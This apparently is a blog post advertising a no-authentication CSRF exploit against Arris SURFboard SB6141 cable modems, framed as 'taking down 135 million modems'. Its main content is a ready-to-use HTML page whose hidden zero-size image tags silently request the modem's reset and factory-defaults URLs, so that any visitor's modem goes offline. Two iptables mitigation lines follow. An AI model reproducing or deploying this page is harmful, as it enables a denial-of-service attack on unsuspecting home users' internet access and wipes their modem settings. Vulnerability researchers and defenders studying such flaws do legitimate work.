Taking down 135 million modems, NO AUTH CSRF RESET EXPLOIT (Super simple!)

ARRIS (formerly Motorola) SURFboard modems are highly popular broadband cable modems with a reputation for reliability. The SB6141 model in particular can be found for around $70 US, is capable of supporting well over 150 megabit speeds, and works with all the major US Internet providers. According to ARRIS’ documentation, the SB6141 is the world’s most popular cable modem with over 135 million in production.

VENDOR : motorola

Website : http://www.surfboard.com/products/sb6141/

Affected firmware : SB_KOMODO-1.0.6.14-SCM01-NOSH

Here is the proof of concept code for remote modem reset and its super easy!

Arris SURFboard SB6141 NO AUTH and CSRF RESET EXPLOIT
[*] Vulnerability found by : David Longenecker
[*] Exploit by : M U Suraj($r00t)

<!DOCTYPE html>

<html>
  <head>
    <title>
      Arris RESET
    </title>
  </head>
  <body>
    <h1 style=”color:dodgerblue;font-family:consolas;”>Arris SURFboard SB6141 NO AUTH RESET CSRF EXPLOIT</h1>
    <u style=”font-family:consolas;”>Created by Suraj($r00t)</u>
<img src=”http://192.168.100.1/reset.htm ”  style=”width:0px;height:0px;”>

    <img src=”http://192.168.100.1/cmConfigData.htm?BUTTON_INPUT1=Reset+All+Defaults ”  style=”width:0px;height:0px;”>
  </body>
</html>

 

Easy Patches

  1. Adding rules to IP Tables to drop the packet on 192.168.100.1. (iptables -I FORWARD -d 192.168.100.1 -j DROP, iptables -I FORWARD -s x.x.x.x -d 192.168.100.1 -j ACCEPT)
  2. Wait for the security update, expectations maybe UI Authentication and CSRF protection.

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s